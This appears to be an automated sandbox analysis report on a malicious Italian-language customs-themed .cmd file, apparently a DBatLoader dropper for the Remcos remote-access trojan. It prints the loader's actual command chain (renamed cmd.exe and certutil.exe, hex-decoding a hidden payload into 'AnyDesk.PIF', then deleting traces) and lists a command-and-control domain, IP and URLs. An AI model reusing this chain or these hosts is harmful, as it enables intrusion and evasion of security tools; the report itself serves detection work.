      Source: C:\Users\Public\Libraries\AnyDesk.PIF | Code function: 9_2_02B7894C LoadLibraryW,GetProcAddress,FreeLibrary,9_2_02B7894C
      Source: C:\Users\Public\alpha.exe | Code function: 3_2_00007FF7E1DC823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,3_2_00007FF7E1DC823C
      Source: C:\Users\Public\alpha.exe | Code function: 3_2_00007FF7E1DC8FA4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_00007FF7E1DC8FA4
      Source: C:\Users\Public\alpha.exe | Code function: 3_2_00007FF7E1DC93B0 SetUnhandledExceptionFilter,3_2_00007FF7E1DC93B0
      Source: C:\Users\Public\alpha.exe | Code function: 5_2_00007FF7E1DC8FA4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_00007FF7E1DC8FA4
      Source: C:\Users\Public\alpha.exe | Code function: 5_2_00007FF7E1DC93B0 SetUnhandledExceptionFilter,5_2_00007FF7E1DC93B0
      Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF67C5C53E0 SetUnhandledExceptionFilter,6_2_00007FF67C5C53E0
      Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF67C5C4E18 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_00007FF67C5C4E18
      Source: C:\Users\Public\alpha.exe | Code function: 10_2_00007FF7E1DC8FA4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,10_2_00007FF7E1DC8FA4
      Source: C:\Users\Public\alpha.exe | Code function: 10_2_00007FF7E1DC93B0 SetUnhandledExceptionFilter,10_2_00007FF7E1DC93B0

      HIPS / PFW / Operating System Protection Evasion

      Source: C:\Windows\System32\extrac32.exe | File created: C:\Users\Public\kn.exe
      Source: C:\Windows\System32\extrac32.exe | File created: C:\Users\Public\alpha.exe
      Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF67C577024 GetModuleHandleW,GetProcAddress,#356,#357,CloseHandle,LocalFree,LocalFree,LocalFree,ImpersonateLoggedOnUser,#356,EqualSid,#357,LogonUserExW,GetLastError,ImpersonateLoggedOnUser,#356,#359,RevertToSelf,#356,6_2_00007FF67C577024
      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\extrac32.exe C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"
      Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
      Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\Documentazione_Doganale_richieste_di_copia.cmd" "C:\\Users\\Public\\AnyDesk.jpeg" 9
      Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\AnyDesk.jpeg" "C:\\Users\\Public\\Libraries\\AnyDesk.PIF" 12
      Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\Public\Libraries\AnyDesk.PIF C:\Users\Public\Libraries\AnyDesk.PIF
      Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S
      Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\AnyDesk.jpeg" / A / F / Q / S
      Source: C:\Users\Public\alpha.exe | Process created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
      Source: C:\Users\Public\alpha.exe | Process created: C:\Users\Public\kn.exe C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\Documentazione_Doganale_richieste_di_copia.cmd" "C:\\Users\\Public\\AnyDesk.jpeg" 9
      Source: C:\Users\Public\alpha.exe | Process created: C:\Users\Public\kn.exe C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\AnyDesk.jpeg" "C:\\Users\\Public\\Libraries\\AnyDesk.PIF" 12
      Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF67C5A72B0 CAFindByName,#359,LocalAlloc,InitializeSecurityDescriptor,GetLastError,SetSecurityDescriptorDacl,GetLastError,GetSecurityDescriptorLength,LocalAlloc,MakeSelfRelativeSD,GetLastError,CASetCASecurity,CAUpdateCAEx,#357,LocalFree,LocalFree,LocalFree,CACloseCA,6_2_00007FF67C5A72B0
      Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF67C574E98 AllocateAndInitializeSid,GetLastError,#357,GetCurrentThread,GetLastError,OpenThreadToken,GetLastError,GetCurrentProcess,GetLastError,OpenProcessToken,GetLastError,DuplicateToken,GetLastError,CheckTokenMembership,GetLastError,CloseHandle,CloseHandle,FreeSid,6_2_00007FF67C574E98
      Source: C:\Users\Public\alpha.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale,3_2_00007FF7E1DC51EC
      Source: C:\Users\Public\alpha.exe | Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetDateFormatW,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,realloc,3_2_00007FF7E1DB6EE4
      Source: C:\Users\Public\alpha.exe | Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW,3_2_00007FF7E1DC3140
      Source: C:\Users\Public\alpha.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale,5_2_00007FF7E1DC51EC
      Source: C:\Users\Public\alpha.exe | Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetDateFormatW,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,realloc,5_2_00007FF7E1DB6EE4
      Source: C:\Users\Public\alpha.exe | Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW,5_2_00007FF7E1DC3140
      Source: C:\Users\Public\kn.exe | Code function: LoadLibraryExW,SearchPathW,FindResourceExW,GetUserDefaultUILanguage,GetLocaleInfoW,wcsncmp,GetSystemDefaultUILanguage,FreeLibrary,FreeLibrary,LoadLibraryExW,FreeLibrary,6_2_00007FF67C5C3800
      Source: C:\Users\Public\Libraries\AnyDesk.PIF | Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,9_2_02B65ACC
      Source: C:\Users\Public\Libraries\AnyDesk.PIF | Code function: GetLocaleInfoA,9_2_02B6A7C4
      Source: C:\Users\Public\Libraries\AnyDesk.PIF | Code function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,9_2_02B65BD8
      Source: C:\Users\Public\Libraries\AnyDesk.PIF | Code function: GetLocaleInfoA,9_2_02B6A810
      Source: C:\Users\Public\alpha.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale,10_2_00007FF7E1DC51EC
      Source: C:\Users\Public\alpha.exe | Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetDateFormatW,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,realloc,10_2_00007FF7E1DB6EE4
      Source: C:\Users\Public\alpha.exe | Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW,10_2_00007FF7E1DC3140
      Source: C:\Windows\System32\cmd.exe | Queries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\cmd.exe | Queries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\cmd.exe | Queries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\cmd.exe | Queries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\cmd.exe | Queries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\cmd.exe | Queries volume information: C:\ VolumeInformation
      Source: C:\Users\Public\alpha.exe | Queries volume information: C:\ VolumeInformation
      Source: C:\Users\Public\alpha.exe | Queries volume information: C:\ VolumeInformation
      Source: C:\Users\Public\alpha.exe | Code function: 3_2_00007FF7E1DD86FC _get_osfhandle,GetLocalTime,SetLocalTime,SetLocalTime,GetLastError,GetLastError,3_2_00007FF7E1DD86FC
      Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF67C5ABEE8 LookupAccountNameW,GetLastError,GetLastError,#357,LocalAlloc,LocalAlloc,#357,LookupAccountNameW,GetLastError,#357,LocalFree,LocalFree,6_2_00007FF67C5ABEE8
      Source: C:\Users\Public\alpha.exe | Code function: 3_2_00007FF7E1DB586C GetVersion,3_2_00007FF7E1DB586C
      Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF67C4F5648 #357,#357,DsGetSiteNameW,#359,LocalAlloc,LocalAlloc,GetTickCount,DsGetSiteNameW,GetTickCount,#207,LocalFree,#359,NetApiBufferFree,#357,#357,#207,LocalFree,#359,#359,#359,LocalFree,NetApiBufferFree,NetApiBufferFree,LocalFree,LocalFree,#357,DsUnBindW,6_2_00007FF67C4F5648
      Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF67C4D54A0 wcschr,NetApiBufferFree,DsFreeNameResultW,#13,LocalFree,DsGetDcNameW,#359,#224,#224,DsBindW,#357,DsCrackNamesW,#357,#145,#359,#359,#14,#359,#73,#359,#208,#26,#127,LocalFree,#140,#359,#224,#167,#27,#357,#357,#41,NetApiBufferFree,DsUnBindW,DsFreeNameResultW,#13,LocalFree,6_2_00007FF67C4D54A0
      Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF67C4EE568 #357,LookupAccountSidW,GetLastError,#357,DsGetDcNameW,DsBindW,DsGetDomainControllerInfoW,DsGetDomainControllerInfoW,#357,DsUnBindW,NetApiBufferFree,LocalFree,6_2_00007FF67C4EE568
      Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF67C4D227C DsGetDcNameW,#357,DsBindW,DsCrackNamesW,#357,#357,#357,#357,#357,LocalAlloc,#359,DsUnBindW,NetApiBufferFree,DsFreeNameResultW,LocalFree,LocalFree,6_2_00007FF67C4D227C
      MITRE ATT&CK matrix (one column per tactic; a leading number is the count of matching signatures for that technique)

      Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
      Gather Victim Identity Information | Acquire Infrastructure | 2 Valid Accounts | 2 Native API | 1 DLL Side-Loading | 1 DLL Side-Loading | 2 Disable or Modify Tools | OS Credential Dumping | 1 System Time Discovery | Remote Services | 11 Archive Collected Data | 3 Ingress Tool Transfer | Exfiltration Over Other Network Medium | 1 Data Encrypted for Impact
      Credentials | Domains | Default Accounts | Scheduled Task/Job | 2 Valid Accounts | 2 Valid Accounts | 1 Deobfuscate/Decode Files or Information | LSASS Memory | 1 Account Discovery | Remote Desktop Protocol | Data from Removable Media | 21 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
      Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 21 Access Token Manipulation | 2 Obfuscated Files or Information | Security Account Manager | 1 System Network Connections Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 3 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
      Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 11 Process Injection | 1 Install Root Certificate | NTDS | 1 File and Directory Discovery | Distributed Component Object Model | Input Capture | 114 Application Layer Protocol | Traffic Duplication | Data Destruction
      Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Timestomp | LSA Secrets | 35 System Information Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
      Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 DLL Side-Loading | Cached Domain Credentials | 1 Query Registry | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
      DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 211 Masquerading | DCSync | 231 Security Software Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
      Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 2 Valid Accounts | Proc Filesystem | 1 Virtualization/Sandbox Evasion | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
      Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 1 Virtualization/Sandbox Evasion | /etc/passwd and /etc/shadow | 1 System Owner/User Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
      IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | 21 Access Token Manipulation | Network Sniffing | Network Service Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement
      Network Security Appliances | Domains | Compromise Software Dependencies and Development Tools | AppleScript | Launchd | Launchd | 11 Process Injection | Input Capture | System Network Connections Discovery | Software Deployment Tools | Remote Data Staging | Mail Protocols | Exfiltration Over Unencrypted Non-C2 Protocol | Firmware Corruption
      Behavior graph (the rendered graphic is not reproduced; the node and edge data recoverable from it follows)

      Behavior Graph ID: 1562927
      Sample: Documentazione_Doganale_ric...
      Start date: 26/11/2024
      Architecture: WINDOWS
      Score: 100
      Top-level signatures: Found malware configuration; Yara detected DBatLoader; C2 URLs / IPs found in malware configuration; 3 other signatures
      Network contact: vandeytas.ru.com (50.7.187.218), port 443, local ports 49730 and 49731, COGENT-174US, United States; contacted by AnyDesk.PIF

      Process tree, with dropped files and the signatures attached to each process:
      cmd.exe
        extrac32.exe
          dropped: C:\Users\Public\alpha.exe (PE32+)
          signatures: Drops PE files to the user root directory; Drops or copies certutil.exe with a different name (likely to bypass HIPS); Drops or copies cmd.exe with a different name (likely to bypass HIPS)
        AnyDesk.PIF
          network: vandeytas.ru.com 50.7.187.218:443
          signatures: Multi AV Scanner detection for dropped file; Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
        alpha.exe
          kn.exe
            signatures: Registers a new ROOT certificate; Drops PE files with a suspicious file extension
        5 other processes, one of which started each of:
          kn.exe
            dropped: C:\Users\Public\Libraries\AnyDesk.PIF (PE32)
          extrac32.exe
            dropped: C:\Users\Public\kn.exe (PE32+)

      Source | Detection | Scanner | Label | Link
      Documentazione_Doganale_richieste_di_copia.cmd | 8% | ReversingLabs | Text.Trojan.Generic |

      Source | Detection | Scanner | Label | Link
      C:\Users\Public\Libraries\AnyDesk.PIF | 68% | ReversingLabs | Win32.Trojan.Remcos |
      C:\Users\Public\alpha.exe | 0% | ReversingLabs | |
      C:\Users\Public\kn.exe | 0% | ReversingLabs | |
      No Antivirus matches
      No Antivirus matches
      Source | Detection | Scanner | Label | Link
      https://vandeytas.ru.com/233_Hlvzmhuinffj | 0% | Avira URL Cloud | safe |
      https://vandeytas.ru.com/U | 0% | Avira URL Cloud | safe |
      https://vandeytas.ru.com/233_Hlvzmhuinffg | 0% | Avira URL Cloud | safe |
      https://vandeytas.ru.com/233_HlvzmhuinffLLg | 0% | Avira URL Cloud | safe |
      https://vandeytas.ru.com/233_Hlvzmhuinff; | 0% | Avira URL Cloud | safe |
      https://vandeytas.ru.com/M | 0% | Avira URL Cloud | safe |
      https://vandeytas.ru.com/233_HlvzmhuinffLL | 0% | Avira URL Cloud | safe |
      https://vandeytas.ru.com/233_Hlvzmhuinff/ | 0% | Avira URL Cloud | safe |
      https://vandeytas.ru.com/Qu | 0% | Avira URL Cloud | safe |
      https://vandeytas.ru.com/233_Hlvzmhuinffc | 0% | Avira URL Cloud | safe |
      https://vandeytas.ru.com/233_Hlvzmhuinffq | 0% | Avira URL Cloud | safe |
      https://vandeytas.ru.com/233_Hlvzmhuinff1 | 0% | Avira URL Cloud | safe |
      https://vandeytas.ru.com/233_Hlvzmhuinffv4 | 0% | Avira URL Cloud | safe |
      https://vandeytas.ru.com:443/233_Hlvzmhuinffvandeytas.ru.comvandeytasr | 0% | Avira URL Cloud | safe |
      https://vandeytas.ru.com/ | 0% | Avira URL Cloud | safe |
      https://vandeytas.ru.com/233_HlvzmhuinffL | 0% | Avira URL Cloud | safe |
      https://vandeytas.ru.com/5 | 0% | Avira URL Cloud | safe |
      https://vandeytas.ru.com/233_Hlvzmhuinff | 0% | Avira URL Cloud | safe |
      https://vandeytas.ru.com/- | 0% | Avira URL Cloud | safe |
      https://vandeytas.ru.com/7000 | 0% | Avira URL Cloud | safe |
      https://vandeytas.ru.com/233_HlvzmhuinffY | 0% | Avira URL Cloud | safe |
      https://vandeytas.ru.com/233_HlvzmhuinffLLI | 0% | Avira URL Cloud | safe |
      https://vandeytas.ru.com/E | 0% | Avira URL Cloud | safe |
      https://vandeytas.ru.com:443/233_Hlvzmhuinff | 0% | Avira URL Cloud | safe |
      https://vandeytas.ru.com/ww.vU | 0% | Avira URL Cloud | safe |
      https://vandeytas.ru.com/233_Hlv | 0% | Avira URL Cloud | safe |
      https://vandeytas.ru.com/233_HlvzmhuinffT | 0% | Avira URL Cloud | safe |
      https://vandeytas.ru.com/8g | 0% | Avira URL Cloud | safe |
      https://vandeytas.ru.com/233_HlvzmhuinffM | 0% | Avira URL Cloud | safe |
      https://vandeytas.ru.com/= | 0% | Avira URL Cloud | safe |
      Name | IP | Active | Malicious | Antivirus Detection | Reputation
      vandeytas.ru.com | 50.7.187.218 | true | true | | unknown

      Name | Malicious | Antivirus Detection | Reputation
      https://vandeytas.ru.com/233_Hlvzmhuinff | true | Avira URL Cloud: safe | unknown
      Name | Source | Malicious | Antivirus Detection | Reputation
      https://%ws/%ws_%ws_%ws/service.svc/%wsADPolicyProviderSCEP | kn.exe, 00000006.00000000.1699078959.00007FF67C5CE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000006.00000002.1702405563.00007FF67C5CE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000008.00000000.1704266482.00007FF67C5CE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000008.00000002.1716584582.00007FF67C5CE000.00000002.00000001.01000000.00000005.sdmp, kn.exe.4.dr | false | | high
      https://login.microsoftonline.com/%s/oauth2/authorize | kn.exe | false | | high
      https://vandeytas.ru.com/233_Hlvzmhuinffg | AnyDesk.PIF, 00000009.00000002.2940156410.000000000091E000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000003.2916840538.000000000091C000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
      https://vandeytas.ru.com/233_Hlvzmhuinffj | AnyDesk.PIF, 00000009.00000003.2460677716.0000000000939000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
      https://login.microsoftonline.com/%s/oauth2/token | kn.exe | false | | high
      https://vandeytas.ru.com/U | AnyDesk.PIF, 00000009.00000003.2026067126.00000000008FF000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000003.2048349573.0000000000911000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
      https://vandeytas.ru.com/233_Hlvzmhuinffc | AnyDesk.PIF, 00000009.00000003.2460677716.0000000000939000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000002.2940156410.0000000000939000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000003.2048222769.0000000000939000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000003.2136254211.0000000000939000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000003.2504432392.0000000000939000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000003.2308408762.0000000000939000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
      https://vandeytas.ru.com/M | AnyDesk.PIF, 00000009.00000003.2354511256.0000000000911000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000003.1782604010.00000000008F7000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
      https://vandeytas.ru.com/Qu | AnyDesk.PIF, 00000009.00000003.2136254211.0000000000911000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
      https://vandeytas.ru.com/233_HlvzmhuinffLLg | AnyDesk.PIF, 00000009.00000002.2940156410.000000000091E000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
      https://vandeytas.ru.com/233_Hlvzmhuinff; | AnyDesk.PIF, 00000009.00000002.2940156410.000000000091E000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000003.2916840538.000000000091C000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
      https://enterpriseregistration.windows.net/EnrollmentServer/key/ | kn.exe | false | | high
      https://vandeytas.ru.com/233_Hlvzmhuinff/ | AnyDesk.PIF, 00000009.00000003.2354387925.000000000092C000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
      https://vandeytas.ru.com/233_HlvzmhuinffLL | AnyDesk.PIF, 00000009.00000003.2308408762.000000000092C000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000003.2354387925.000000000092C000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
      https://vandeytas.ru.com/233_Hlvzmhuinff1 | AnyDesk.PIF, 00000009.00000003.2354387925.000000000092C000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
      https://vandeytas.ru.com/233_Hlvzmhuinffq | AnyDesk.PIF, 00000009.00000003.2765080066.0000000000939000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
      https://vandeytas.ru.com/233_Hlvzmhuinffv4 | AnyDesk.PIF, 00000009.00000003.2916840538.00000000008E8000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000003.2765080066.00000000008E4000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
      https://vandeytas.ru.com/ | AnyDesk.PIF, 00000009.00000003.2136254211.0000000000911000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown
      https://vandeytas.ru.com:443/233_Hlvzmhuinffvandeytas.ru.comvandeytasr | AnyDesk.PIF, 00000009.00000003.2916840538.0000000000906000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000003.2612107894.0000000000906000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000003.2765080066.0000000000906000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000002.2940156410.0000000000906000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000003.2460677716.0000000000905000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
      https://login.microsoftonline.com/%s/oauth2/authorizeJoinStatusStorage::SetDefaultDiscoveryMetadatah | kn.exe, 00000006.00000000.1699078959.00007FF67C5CE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000006.00000002.1702405563.00007FF67C5CE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000008.00000000.1704266482.00007FF67C5CE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000008.00000002.1716584582.00007FF67C5CE000.00000002.00000001.01000000.00000005.sdmp, kn.exe.4.dr | false | | high
      https://vandeytas.ru.com/233_HlvzmhuinffL | AnyDesk.PIF, 00000009.00000003.1919870551.000000000092C000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
      https://vandeytas.ru.com/5 | AnyDesk.PIF, 00000009.00000003.2354511256.0000000000911000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
      https://vandeytas.ru.com/u | AnyDesk.PIF, 00000009.00000003.2026067126.00000000008FF000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000003.1782604010.00000000008F7000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
      https://vandeytas.ru.com/- | AnyDesk.PIF, 00000009.00000003.2026067126.00000000008FF000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000003.2048349573.0000000000911000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000003.2136254211.0000000000911000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
      https://vandeytas.ru.com/m | AnyDesk.PIF, 00000009.00000003.2048349573.0000000000911000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000003.2136254211.0000000000911000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
      https://enterpriseregistration.windows.net/EnrollmentServer/DeviceEnrollmentWebService.svc | kn.exe | false | | high
      https://vandeytas.ru.com/7000 | AnyDesk.PIF, 00000009.00000003.2136254211.0000000000911000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
      https://vandeytas.ru.com/233_HlvzmhuinffLLI | AnyDesk.PIF, 00000009.00000003.1919870551.000000000092C000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
      https://vandeytas.ru.com/233_HlvzmhuinffY | AnyDesk.PIF, 00000009.00000003.1919870551.000000000092C000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000003.1983981138.000000000092C000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
      https://vandeytas.ru.com/E | AnyDesk.PIF, 00000009.00000003.2612107894.0000000000911000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
      https://vandeytas.ru.com:443/233_Hlvzmhuinff | AnyDesk.PIF, 00000009.00000003.2026067126.00000000008FF000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
      https://vandeytas.ru.com/233_HlvzmhuinffM | AnyDesk.PIF, 00000009.00000003.2460677716.0000000000939000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000003.2916840538.0000000000939000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000003.2136254211.000000000092C000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
      http://www.pmail.com | AnyDesk.PIF, AnyDesk.PIF, 00000009.00000002.2941867830.00000000029C2000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000003.1720468167.00000000029C8000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000002.2957250885.000000007F9FF000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000003.1720758818.000000007F880000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000002.2942456888.0000000002B8E000.00000004.00001000.00020000.00000000.sdmp | false | |
                          high
                          https://%ws/%ws_%ws_%ws/service.svc/%wskn.exefalse
                            high
                            https://enterpriseregistration.windows.net/EnrollmentServer/device/kn.exefalse
                              high
                              https://vandeytas.ru.com/233_HlvAnyDesk.PIF, 00000009.00000002.2956191980.000000002094D000.00000004.00001000.00020000.00000000.sdmptrue
                              • Avira URL Cloud: safe
                              unknown
                              https://vandeytas.ru.com/ww.vUAnyDesk.PIF, 00000009.00000003.2136254211.0000000000911000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://vandeytas.ru.com/233_HlvzmhuinffTAnyDesk.PIF, 00000009.00000002.2940156410.0000000000939000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000003.2916840538.0000000000939000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
